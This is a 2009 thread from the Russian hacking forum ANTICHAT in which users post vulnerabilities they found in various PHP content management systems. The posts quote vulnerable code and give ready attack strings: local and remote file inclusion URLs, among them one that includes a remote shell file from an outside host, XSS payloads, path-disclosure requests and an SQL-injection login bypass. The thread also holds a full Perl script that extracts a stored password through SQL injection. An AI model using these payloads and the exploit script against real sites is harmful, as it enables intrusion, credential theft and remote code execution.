ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.11.2009, 13:36
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: F3Site
Author: unnamed
Version: 2009
LFI
file: index.php
PHP код:
if(file_exists('./mod/'.$_GET['co'].'.php'))
{
(include './mod/'.$_GET['co'].'.php') OR $content->set404();
}
elseif(file_exists('./plugins/'.$_GET['co'].'/default.php'))
{
(include './plugins/'.$_GET['co'].'/default.php') OR $content->set404();
}
target: index.php?co=../../hello.php%00
mq=off
Thx, jokester!
извиняюсь,это только на моем сервере нужна кавычка.
Последний раз редактировалось m0Hze; 21.11.2009 в 14:01..
|
|
|
21.11.2009, 13:57
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
FACIL CMS
Local File Include in modules.php:
PHP код:
...
$_MODLOAD = trim($_GET['modload']);
...
if(file_exists(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/index.php'))
{
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/i18n/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
...
PoC:
Код:
http://localhost/facil/modules.php?modload=existing_dir/../../../FILE//////////[...]
phpinfo file:
Код:
http://localhost/facil/phpinfo.php
Последний раз редактировалось Ins3t; 21.11.2009 в 14:13..
|
|
|
|
21.11.2009, 14:14
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Blogs Files
Sql-injection
/member/edit.php
PHP код:
$memberid = $_POST['id'];
// Н-ко строк спустя).
$query2 = "SELECT * FROM accounts WHERE id = '$memberid'";
$result2 = mysql_query($query2) or die("Error on QUERY 2: ".mysql_error());
Sql-injection
/create_account.php
PHP код:
if ($_POST['username']=="")
{
echo "<p>
<label for='username'>Desired Username: </label>
<input type='text' name='username' style='background-color: red;' size='30' maxlength='15'/>
</p>";
}
//Н-ко строк спустя).
$result = mysql_query("SELECT * FROM accounts
WHERE Username='$_POST[username]'");
|
|
|
|
21.11.2009, 14:24
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Plume CMS
Author: unnamed
Version: 1.2.3
RFI
file: prepend.php
PHP код:
if (basename($_SERVER['SCRIPT_NAME']) == 'prepend.php') exit;
include_once $_PX_config['manager_path'].'/conf/config.php';
include_once $_PX_config['manager_path'].'/inc/class.config.php';
include_once $_PX_config['manager_path'].'/inc/lib.text.php';
include_once $_PX_config['manager_path'].'/inc/class.hook.php';
include_once $_PX_config['manager_path'].'/inc/class.dispatcher.php';
include_once $_PX_config['manager_path'].'/inc/class.rss.php';
include_once $_PX_config['manager_path'].'/inc/class.search.php';
include_once $_PX_config['manager_path'].'/inc/class.error404.php';
include_once $_PX_config['manager_path'].'/inc/class.category.php';
include_once $_PX_config['manager_path'].'/inc/class.resource.php';
include_once $_PX_config['manager_path'].'/inc/class.news.php';
include_once $_PX_config['manager_path'].'/inc/class.article.php';
include_once $_PX_config['manager_path'].'/inc/class.resourceset.php';
include_once $_PX_config['manager_path'].'/inc/lib.frontend.php';
include_once $_PX_config['manager_path'].'/inc/lib.sql.php';
include_once $_PX_config['manager_path'].'/inc/class.paginator.php';
include_once $_PX_config['manager_path'].'/inc/class.cache.php';
include_once $_PX_config['manager_path'].'/inc/class.sitemap.php';
include_once $_PX_config['manager_path'].'/inc/class.l10n.php';
Как видим,есть защита:
PHP код:
if (basename($_SERVER['SCRIPT_NAME']) == 'prepend.php') exit;
Если обратиться к этому скрипту напрямую,он просто прекратит работу.
Но авторы не учли маленькую вещь,регистр.Легкий и изящный обход:
target: prepend.PhP?_PX_config[manager_path]=http://site.ru/shell.txt%00
Просто меняем регистр у расширения,и проверка уже не срабатывает.Следует отметить,что наш файл заинклудиться стопицот раз,так что в своем шеле пишем,в самом конце, Exit(); Таким образом,предотвратиться инклуд остальных шелов.
Важно! Необходимо registers_global = on
Iceangel_: Не все требования указал к этой баге, подумай...
Последний раз редактировалось Iceangel_; 22.11.2009 в 12:38..
|
|
|
|
21.11.2009, 18:56
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Free Arcade Script v2.0rc1
Local File Include in index.php:
register_globals = ON
PHP код:
...
include ('includes/core.php');
...
default:
include ('templates/'.$template.'/base_home.php');
include ('includes/defaultsubmenu.php');
include ('includes/defaultsubmenu2.php');
break;
...
In core.php:
PHP код:
...
if($_GET['template']){
exit('N00B.');
}
...
$template = $set['template'];
...
Теперь говоря по русски: это у них типа защита такая, то есть они пушут, что если передано $_GET['template'], то выводится сообщение "Нуб" 
Но после этого они написали:
PHP код:
$template = $set['template'];
И открыли нам путь к инклуду:
Код:
http://localhost/11/index.php?set[template]=../../FILE%00
Но по сути
PHP код:
if($_GET['template']){
exit('N00B.');
}
Так же очень просто обходится, достаточно передать template через POST или COOKIE 
|
|
|
|
21.11.2009, 18:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
CMS AVA LIFE
Активная XSS:
Отправляем на сервер HTTP запрос. Добавляем к одному из Header'ов (В середине где нибудь)
<script>alert();</script>
А администратора сайта в Статистике сработает скрипт.
|
|
|
|
23.11.2009, 10:21
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Название: ClanSphere
Версия: 2009.0.2
Пассивная XSS:
http://chat/index.php?mod=awards&action=list&start=0&sort=2">< script>alert();</script>
Раскрытие путей:
http://chat/mods/gallery/image.php?pic=1&size=9999999999999999999999999999
http://chat/mods/gallery/image.php?pic=1&size[]=9
|
|
|
|
23.11.2009, 14:52
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Blob CMS
Sql-injection
/blogin.php
PHP код:
if(!isset($_SESSION['logged'])){
//This happens when they've tried to log in at least once. First, check their credentials.
$usernum = blob_check_login($_POST['buname'], $_POST['bpword']);
$lattempt = $_POST['lattempt'];
if($lattempt < 3 && $usernum == "FAIL") {
//Whoops, wrong password. Try again.
$page['pagetitle'] = "User Login";
$lattempt++;
?>
Смотрим функцию blob_check_login()
/blob.php
PHP код:
function blob_check_login ($username, $password) {
//This function, obviously, checks a username and password pair.
$goodname = strtolower($username); //Yeah, I hate case-sensitive usernames. Fuck y'all.
$goodpass = md5($password);
blob_connect();
$query = "SELECT * FROM `" . UTABLE . "` WHERE `bl0bdeath`='" . $goodname . "' AND `bl0bnumber`='" . $goodpass . "'";
$result = @mysql_query($query);
|
|
|
|
Extreme CMS 0.9 SQL Injection Exploit |
26.11.2009, 21:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Extreme CMS 0.9 SQL Injection Exploit
Extreme CMS 0.9
SQL Injection
Vuln file: /calendar/show.php
PHP код:
... ... ... ... ...
$id = $_GET['event']; // from clicked day
$sho = $_GET['sho']; // display method
$query = "SELECT * FROM calendar WHERE id = '$id' "; // retrieves ONE record
$result = mysql_query($query);
$myrow = mysql_fetch_array($result);
$ev_1 = $myrow['ev_dat']; // is date for that record (allows multiple events selection)
$found = $myrow['ev_dat'];
$pieces = explode("-", $ev_1);
$monum = intval($pieces[1]);
$query = "SELECT * from calendar WHERE ev_dat = '$ev_1' "; // retrieves ALL date matches
$result = mysql_query($query);
echo"<table width='480' 'cellpadding='3' cellspacing='3' align='center' style='border: thin dotted #cccccc;' bgcolor='#f7f7f7'><tr><td>";
echo "<h2>". $mo[$monum]. " ". intval($pieces[2]). ", ". intval($pieces[0]). "</h2>";
... ... ... ... ...
Не какой фильтрации входящих данных нет. Есть одно но... результат sql запроса обрабатывается intval'ом.
Для обхода intval (если это можно назвать обходом  ) и упрощения вывода написал эксплойт
Exploit:
Код:
#!/usr/bin/perl
#-----------------------------------------
# Extreme CMS 0.9 SQL Injection Exploit
#-----------------------------------------
# Download Script : http://sourceforge.net/projects/extremecms
#
# Author : RulleR aka Pin4eG
# Contact : rull3rrr[at]gmail[dot]com
# Visit : forum.antichat.ru
#-----------------------------------------
use LWP;
use Fcntl;
#________________ CONFIG _______________
$vuln = '/calendar/show.php?event=';
$length = 40;
$column_name = 'password';
$table_name = 'auth';
$id = 1; # user id
$regexp = '<h2> 0, (.*)<\/h2>';
$filename = 'Exp_result.txt';
#_______________________________________
$title = "
[*]==================================[*]
! !
! Extreme CMS SQL Injection Exploit !
! !
! Found && coded by RulleR !
! !
[*]==================================[*]
";
print $title;
print "\n[+] Enter Host: ";
chop ($host = <>);
print "\n[>] Exploiting started... $host\n";
for ($start = 1; $start<=$length; $start++) {
$inj = '-1%27+union+select+null,ord(substr((select+'.$column_name.'+from+'.$table_name.'+where+id='.$id.'),'.$start.',1)),null,null,null+--+';
$req = $host.$vuln.$inj;
$cont = &WebGet($req);
$cont =~ /$regexp/;
last if (!$1);
$char = chr($1);
push (@res, $char);
}
print "\n------------- [Result] --------------\n";
print @res;
print "\n-------------------------------------\n";
print "\n[!] Exploiting finished :)\n";
sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
print RESULT $title;
print RESULT "\n------------- [Result] --------------\n";
print RESULT @res;
print RESULT "\n-------------------------------------\n";
close (RESULT);
print "\nResult saving in $filename\n";
sub WebGet() {
$url = $_[0];
$request = HTTP::Request->new(GET => $url);
$u_a = LWP::UserAgent->new();
$u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$u_a->timeout(5);
$response = $u_a->request($request);
if ($response->is_error) {
print " ! Error: ".$response->status_line.".\n"; die " :(\n";
}
return $response->content;
}
securityreason.com
Для успешной эксплуатации необходимо:
magic quotes = Off
© RulleR aka Pin4eG
|
|
|
|
28.11.2009, 00:55
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
phpKB <= 2.0 auth bypass
/admin/
login: asd' OR 1=1 -- -
pass: asdasd
Сам движок скачать не удалось, поэтому зависимости и уязвимый кусок кода не привожу.
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид